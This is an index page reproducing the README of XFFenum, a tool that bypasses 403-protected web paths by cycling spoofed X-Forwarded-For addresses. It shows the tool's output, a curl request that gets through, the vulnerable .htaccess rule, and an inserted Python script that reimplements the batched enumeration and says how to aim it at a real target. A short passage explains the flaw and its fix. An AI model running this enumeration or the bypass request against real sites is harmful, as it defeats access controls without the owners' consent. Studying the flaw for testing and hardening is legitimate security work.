Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/vavkamil/XFFenum
X-Forwarded-For [403 forbidden] enumeration
- Host: GitHub
- URL: https://github.com/vavkamil/XFFenum
- Owner: vavkamil
- Created: 2019-07-25T17:48:20.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2024-05-03T19:47:14.000Z (7 months ago)
- Last Synced: 2024-08-01T10:17:24.180Z (4 months ago)
- Language: Python
- Homepage:
- Size: 5.86 KB
- Stars: 87
- Watchers: 3
- Forks: 27
- Open Issues: 2
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
- awesome-bugbounty-tools - XFFenum - X-Forwarded-For [403 forbidden] enumeration (Miscellaneous / Uncategorized)
README
# XFFenum
A simple tool for bypassing 403 Forbidden endpoints that sit behind a load balancer or CDN (for example Cloudflare) and gate access on the client-controlled X-Forwarded-For header.
Based on the [enumXFF](https://github.com/infosec-au/enumXFF) by @infosec_au
### Example
```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration

[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108
673it [00:34, 21.69it/s]
[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"
```

#### Proof of Concept
```
vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA

403 Forbidden
Forbidden
You don't have permission to access /xff on this server.
Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80
```
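How the enumeration in the example above works, as an added example that is not part of XFFenum or of this README: the tool covers 192.168.0.0/16 (65536 addresses) in 13108 requests, so five addresses are packed, comma-separated, into each X-Forwarded-For header, and any batch that is not answered with 403 is reported whole. The script below reimplements that batching in Python with a stand-in server that applies the SetEnvIf rule from the .htaccess fragment further down as the unanchored regex Apache compiles it, and adds a narrowing step the tool does not have: re-testing each address of a hit batch on its own. The batch size of five, the probe() callback interface and the simulated server are assumptions, not the project's code.

```python
#!/usr/bin/env python3
"""Added example, not XFFenum's own code: batched X-Forwarded-For enumeration
against a simulated server, then narrowing a hit down to a single address.

Assumptions (not taken from the page): five addresses per request, the probe()
callback interface, and the stand-in server, which reimplements the rule
    SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
with re.search, because SetEnvIf applies its pattern as an unanchored regex.
"""
import ipaddress
import re
from typing import Callable, Dict, Iterator, List, Optional

Probe = Callable[[Dict[str, str]], int]  # request headers -> HTTP status code

# Hypothetical stand-in for the target: the pattern is the .htaccess string
# verbatim, dots left unescaped, exactly as Apache would compile it.
ALLOW_PATTERN = re.compile("192.168.13.37")


def simulated_server(headers: Dict[str, str]) -> int:
    """Status the .htaccess rule would produce for these request headers."""
    xff = headers.get("X-Forwarded-For", "")
    return 200 if ALLOW_PATTERN.search(xff) else 403


def batches(cidr: str, size: int) -> Iterator[List[str]]:
    """Yield the addresses of cidr in chunks of size (last chunk may be short)."""
    chunk: List[str] = []
    for ip in ipaddress.ip_network(cidr, strict=False):
        chunk.append(str(ip))
        if len(chunk) == size:
            yield chunk
            chunk = []
    if chunk:
        yield chunk


def request_count(cidr: str, size: int = 5) -> int:
    """Requests needed to cover the range when size addresses share one header."""
    hosts = ipaddress.ip_network(cidr, strict=False).num_addresses
    return -(-hosts // size)  # ceiling division


def find_allowed_batch(cidr: str, probe: Probe, size: int = 5) -> Optional[List[str]]:
    """One request per batch, comma-joined in X-Forwarded-For (the tool's
    approach); return the first batch that is not answered with 403."""
    for chunk in batches(cidr, size):
        if probe({"X-Forwarded-For": ", ".join(chunk)}) != 403:
            return chunk
    return None


def narrow(batch: List[str], probe: Probe) -> List[str]:
    """Re-test each address of a hit batch alone to see which one(s) the rule
    really matches; the tool itself stops at reporting the whole batch."""
    return [ip for ip in batch if probe({"X-Forwarded-For": ip}) != 403]


def enumerate_range(cidr: str, probe: Probe, size: int = 5) -> List[str]:
    """Full run: find the passing batch, then narrow it to single addresses."""
    hit = find_allowed_batch(cidr, probe, size)
    return narrow(hit, probe) if hit else []


if __name__ == "__main__":
    print("requests needed:", request_count("192.168.0.0/16"))
    print("allowed address(es):", enumerate_range("192.168.0.0/16", simulated_server))
    # The SetEnvIf pattern is an unanchored regex with unescaped dots, so a
    # value that is not even an IP address passes the stand-in rule as well.
    print("status for 192x168y13z37:", simulated_server({"X-Forwarded-For": "192x168y13z37"}))
```

The passing batch is the one at index 673 (192.168.13.37 through .41), which matches the iteration count on the page's progress bar, and narrowing leaves only 192.168.13.37. The last line of the demo shows why the rule is weaker than it looks: the dots in the SetEnvIf pattern are regex metacharacters and the match is unanchored, so 192x168y13z37 is accepted too. Against a real target, replace simulated_server with a function that sends the request (for instance returning requests.get(url, headers=headers).status_code) and keep the rest unchanged.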
##### .htaccess
```
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess
```

The rule trusts a header the client controls: the proxy passes the value through (Cloudflare appends the connecting address to an X-Forwarded-For the client already sent rather than replacing it), and SetEnvIf compiles the quoted string as an unanchored regular expression, so any value containing a match, such as the five-address list in the example above, is let through. Gating on an address the proxy itself sets (CF-Connecting-IP, or the remote address after mod_remoteip with the proxy ranges trusted) closes this.

### Usage
```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration

usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]
X-Forwarded-For [403 forbidden] enumeration
optional arguments:
-h, --help show this help message and exit
-u URL Forbidden URL path to scan
-i IP_RANGE Single IP or range to use
-t THREADS number of threads (default: 5)
--no-verify-ssl Ignore any and all SSL errors.

Have a nice day :)
```

## References
https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html